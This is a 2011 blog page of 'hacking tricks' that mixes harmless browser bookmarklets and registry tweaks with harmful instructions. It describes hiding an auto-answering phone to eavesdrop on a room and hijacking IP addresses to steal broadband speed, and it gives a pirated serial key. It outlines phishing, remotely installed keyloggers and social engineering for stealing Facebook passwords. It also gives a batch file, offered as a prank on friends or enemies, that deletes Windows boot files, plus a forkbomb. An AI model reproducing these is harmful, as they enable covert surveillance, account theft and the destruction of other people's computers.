Total Pageviews

Wednesday, 30 November 2011

SPY ANYONE USING MOBILE

For using this trick you will need the following things .:
1. Mobile handset
2. Set of Headphones
Lets begin the step by step tutorial on how to spy using your mobile phone .:
1. Plug in your headset/earphone into your mobile phone.
2. Now go to settings of your mobile phone and find the setting for auto answer and activate it.
3. Now turn off the ringtone/volume of your mobile phone also make sure that the vibration is also turned off.
5. Also make sure that the lights of your phone are turned off or place it in such a place where its lights cannot be noticed.
4. Place the mobile phone in some hidden place and make sure that voices of the room can be easily heard through this mobile phone.
5. Now whenever you want to check what is going in the room just dial the mobile number with some other phone.
6. Your phone will be picked automatically and you can hear clearly what’s happening in the room.

COOL JAVASCRIPT WEB BROWSER ADDRESS BAR TRICKS (UPDATED)

These are some really cool JavaScript hacks and tricks that you can use creatively or just have plain fun.

{1} To make each one of these codes work, all you have to do is copy and paste it into the address bar of your browser window and hit “Enter”.

 So here they are :-


PLAY A FUN GAME WHERE YOU CAN SHOOT AT ALL THE ELEMENTS



Now you can play game on any web page, just copy and paste the javascript code given below in the url bar and hit enter. As soon as you hit enter you can observe an triangle shape object in the upper left corner of the window. Navigate it with the help of W, A and D keys and fire using Spacebar.
javascript:var%20s%20=%20document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://erkie.github.com/asteroids.min.js';void(0);


VIEW A PASSWORD BEHIND THE ASTERIX *******


EDIT THE WEBPAGE    (TRICK A FRIEND INTO THINKING YOU HACKED IT)

This code lets you edit any page/website in real-time :) . With Firefox, you can even edit and save the modified pages to your computer. Very nifty code!.Unfortunately can't be used to hack but can to fool someone that you did!
javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

THE BIG WHEEL OF DANCING PICS

This piece of code pulls off all the images from your web page and rotates them in a circle. The best place to test this is a website with many images. (Google Images for an example)
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
If you look carefully in the above code, its rotating the HTML “img” tag. Just replace it with “a” or “p” and watch some links or text rotate instead of images.

INFINITE ALERT BOXES



As soon as you run this javascript a infinite loop of alert boxes will open which cannot be stopped until you restart your web browser. In case of Google Chrome web browser, the browser it self has the capability to stop loop of alert boxes.
javascript:while(1){alert('Restart your brower to close this box!')}


TREMORS

Your browser will be very afraid of this code :) If the code below doesn’t seem to work, please replace > with > and < with <
javascript:function flood(n) {if (self.moveBy) {for (i = 200; i &gt; 0;i--){for (j = n; j &gt; 0; j--) {self.moveBy(1,i); self.moveBy(i,0);self.moveBy(0,-i); self.moveBy(-i,0); } } }}flood(6);{ var inp = "D-X !msagro na dah tsuj resworb rouY"; var outp = ""; for (i = 0; i &lt;= inp.length; i++) {outp =inp.charAt (i) + outp ; } alert(outp) ;}; reverse

THE CALCULATOR

In case you are not in a mood to use the standard windows calculator and want your browser to do the dirty job for you, use this code.
javascript: alert(34343+3434-222);
You can change the numbers according to your choice and also try creative complex equations. Just put your arithmetic into javascript: alert( );

EXPOSING SPOOF WEBSITES

There are times when you are not sure that the website that you are visiting is authentic. Use this code whenever in doubt :-
javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");

USE ANY USB STICK AS RAM ! (RANDOM ACCESS MEMORY)

For those who aren't keen on opening up their PC to put in more memory, Windows Vista has a handy little feature called ReadyBoost that can use USB sticks for additional memory.
 Unfortunately, Windows Vista doesn't take kindly to the slower sticks on the market and refuses to use them. Proving once again that we control the computer and not the other way around, here's four simple steps to get around this limitation and use any USB stick you have to increase yourcomputers memory.


{1}Setup

First things first. Plug the device in. 
Ignore AutoPlay if you have the enabled, 
and go to Computer in the start menu.
When it pops up, right-click the USB stick 
and select properties.

{2} Disable the stick

Click on the Readyboost tab on the properties menu and check Do not restest this device. Click okay and unplug the stick from your computer.


{3} Edit the registry!

Don't panic, it's not as frightening as it sounds. 
Firstly, you need to open regedit
by opening the start menu and typing regedit, then enter.
The registry window should load up.

Using the left-hand pane, work your way through the following folders: HKLM (Local Machine) -> SOFTWARE -> Microsoft -> Windows NT -> CurrentVersion -> EMDgmt.
You'll have a list of USB devices the computer has encountered, one of which should be your USB stick.
Click on it.

Here there's a few details you need to edit. 
Double click on Device Status and change the value to 2, then select ok.
Do the same for ReadSpeedKBs and WriteSpeedKBs, changing their values to both 1000.
Exit the regedit and breathe a sigh of relief.


{4} And back in again
Now all that's left to do is put the stick back in 
and once again go to the device properties 
(Computer > Right-click on drive).
 If you look under the Readyboost Tab,
 you'll be able to now select Use this device.
 Success! Now enjoy your faster PC.

HACK [SIFY,RELIANCE,OTHERS] SPEED UPTO 10 MBPS [BEAM CABLE HACK]

FOR EDUCATIONAL PURPOSES ONLY
First Download this ETHERNET Ip Sniffer called ETHERDETECT

Use the tool to Scan Ip's in your network

Keep Scanning till you get some 200 Ip's ..


Then just change the last 3 digits of your IP Address with the IP's you get In that scanner !!
NOTE:Please save your Ip address somewhere so as to get back to your original ip !

It will say "Ip conflict" error,keep trying with other Ip's untill you succeed.

Sometimes when you will change your Ip you will get same speed ...in that case ..try another ip


..:~Download Link~:..
CODE
http://rapidshare.com/files/46070425/EtherDetect_setup.exe


..:~SERIAL~:..
CODE
YW38X6HKWYT4CTK

3 DIFFERENT WAYS TO HACK FACEBOOK PASSWORDS

There are 4 ways according to my knowledge for hacking Facebook and any other social networking website. There could be more easy ways which you may have discovered so you can share that with us by commenting below. Now have a brief look at all the methods and how they work.
The 3 Methods .:
1. Phishing Attack.
2. Keylogging.
3. Social Engineering.

1. Phishing Attack : This is the most commonly used method for hacking any social networking website’s password because it’s the easiest way to hack any of theinternet websites password. Its widely used by all the hackers of all class. Creating Phishing page is extremely easy on some steps and a nice tutorial on creating it and you are there a person who have just some knowledge about computer or hacking can hack any innocent person. So beware of it and Stay Safe.
2. Keylogging : This is second highly preferred method by anyone, maybe you use at first for hacking but it has some limitation by the way who don’t know what is keylogging it’s a process in which software installed on one’s computer records all his keystrokes and captures screenshots which helps anyone to track down his password and hack his account. It involves remotely installation of keylogger on anyone'scomputer by sharing a crypted file through chat clients or manually installing them on victims computer.
3. Social Engineering : You may think this is non responsive method means first of all what is this, Social Engineering is a method in which you convince your victim for giving you the security question answer or any other answer which can reveal his password means it totally depends on how you can convince one or take change on his mind. well this method is easy for only the mind captures who can convince someone really easily so I will not prefer this method as this method can reveal your decision to your victim.

5 GREAT REGISTRY HACKS

Here are 5 great registry hacks which will help you improve your system features and performance.
registry hacks

1. Security:
USB Drives are one of the major tool through which data transfer takes place. In order to protect your data from getting stolen from you computer with the help of a USB drive you can make the USB drives read only.
Go to  ‘HKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies‘ and   create a new DWORD value ‘WriteProtect‘ and set its value to 1. This will enable you to read from USB drives, but you won’t be able to copy data to it.
2. Sorting Files:
Quite often you want the files to appear according to their names in explorer. In order to restore the ASCII file ordering, perform the following hack :
Go to ‘HKLM\Software\Microsoft\Windows\Currentversion\Policies\Explorer’ and create a new DWORD value called as ‘NoStrCmpLogical’ and set its value to 1.
3. Speeding Up Menu loading time:
In order to make your menus load faster, perform the following tweak.
Go to ‘HKEY_CURRENT_USER\ Control Panel\Desktop‘ and right click ‘MenuShowDelay’ and click ‘Modify’. Change the string value to some nearby 100 value.
4. Reducing Folder Accessibility Time:
To speed up the access to any folder that is pinned to start menu, perform the following hack
Go to ‘HKCR\Folder\shellex\ContextMenuHandlers’ and right click ‘ContextMenuHandlers‘ and click ‘New|Key‘. Type ” (blank space and no quotation marks) and press Enter. Select any folder and right click on it to select ‘Pin to Start Menu’ while holding Shift key.
5. Multiple Logins in Messenger:
By default you are allowed only a single login at a time on Live Windows Messenger. You can override this by
Go to ‘HKLM\Software\Microsoft\WindowsLive\Messenger’ and create a new DWORD value ‘Multiple Instances’ and its values as 1.

CONVERT ANY FILE TO ANY FORMAT



Many users just need to convert some of their files for different purposes and they want them to be for free and for without any software. Use the website ConvertFiles.com 
Just Browse your Filename and select the Output Format and that’s it you are done.

DESTROY ANY COMPUTER EASILY WITH ONE CLICK

DESTROY ANY COMPUTER EASILY WITH ONE CLICK:


Do not try this at your own computer: Well remember that u don’t try this @ ur own computer in any circumstances because the file we are going to create will reboot the computer once and also delete all the file needed by the computer to restart again,so u got it right well if u r pranking with ur friend or ur enemy remember that his or her will never restart unless new Windows is installed.

Here is the Guide to Destroying Virus:
Open up notepad and copy and paste this:

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

And SAVE this file as .bat
Now that’s it ur Virus is ready well it’s a Monster Virus .
Remember Don’t click on this file in ur Computer.

FORKBOMB VIRUS MAKE IT THE SIMPLEAST

Simplest virus
called FORKBOMB virus
just open notepad
and type in
%0|%0
and save as anything.bat
Very simple to remember

This virus will jam the processor and hang/crash the computer.
It doesn't do any damage though.
Just restart and it will be fine

HIDE YOUR IP ADDRESS MAN!!!!!!!!!!!!!!

(can be used for some places where they do not let certain countries use a website)
In the browser -
Go to options - settings - 
paste any proxy there
enjoy surfing



IP address Anonymity level Checked time Country
69.217.73.52      : 8080 anonymous server Feb-08, 17:45 United States
217.28.206.145   : 80 anonymous proxy Feb-08, 17:45 Sweden
97.81.19.227    : 8080 anonymous server Feb-08, 19:00 United States
217.7.172.14     : 80 anonymous proxy Feb-08, 17:46 Germany
202.115.130.23   : 8080 anonymous Feb-08, 17:45 China
209.194.182.139   : 8080 anonymous proxy Feb-08, 17:46 United States
80.87.131.100    : 80 anonymous proxy Feb-08, 17:46 United Kingdom
196.12.184.190    : 3128 anonymous proxy Feb-08, 17:46 Puerto Rico
217.21.240.107    : 80 anonymous Feb-08, 18:00 Netherlands
202.147.186.196    : 8080 anonymous proxy Feb-08, 18:01 Pakistan
140.116.21.154    : 8080 anonymous proxy Feb-08, 18:01 Taiwan
87.248.174.68     : 8080 anonymous Feb-08, 18:01 Moldova, Republic of
213.157.69.92     : 80 anonymous Feb-08, 18:02 Finland
81.211.26.66     : 8080 anonymous proxy server Feb-08, 18:03 Russian Federation
77.48.19.55         : 80 anonymous Feb-08, 18:03 Czech Republic
59.106.138.10       : 80 anonymous Feb-08, 18:04 Japan
60.250.0.22        : 80 anonymous server Feb-08, 18:01 Taiwan
213.212.254.34          : 8080 anonymous server Feb-08, 18:05 Egypt
82.102.77.66           : 8080 anonymous proxy Feb-08, 18:06 Cyprus
87.205.199.25         : 80 anonymous proxy server Feb-08, 18:59 Poland
62.80.4.61         : 8080 anonymous server Feb-08, 17:38 Germany
80.156.84.228      : 80 anonymous Feb-08, 17:30 Germany
196.218.197.68       : 8080 anonymous proxy Feb-08, 17:50 Egypt
12.149.212.1         : 80 anonymous proxy server Feb-08, 17:48 United States
216.244.98.133        : 80 anonymous proxy Feb-08, 17:48 United States
220.227.178.26             : 80 anonymous proxy server Feb-08, 17:51 India
200.85.39.18          : 80 anonymous Feb-08, 17:51 Paraguay
217.116.232.114        : 80 anonymous Feb-08, 17:51 Denmark
8.12.40.183           : 80 anonymous Feb-08, 17:47 United States
203.115.229.180       : 80 anonymous proxy Feb-08, 17:48 Malaysia
66.216.91.200       : 80 anonymous server Feb-08, 17:01 United States
200.68.73.193         : 443 anonymous proxy Feb-08, 17:02 Argentina
75.82.204.246        : 3128 anonymous proxy Feb-08, 17:02 United States
193.251.181.135      : 8080 anonymous proxy server Feb-08, 17:49 France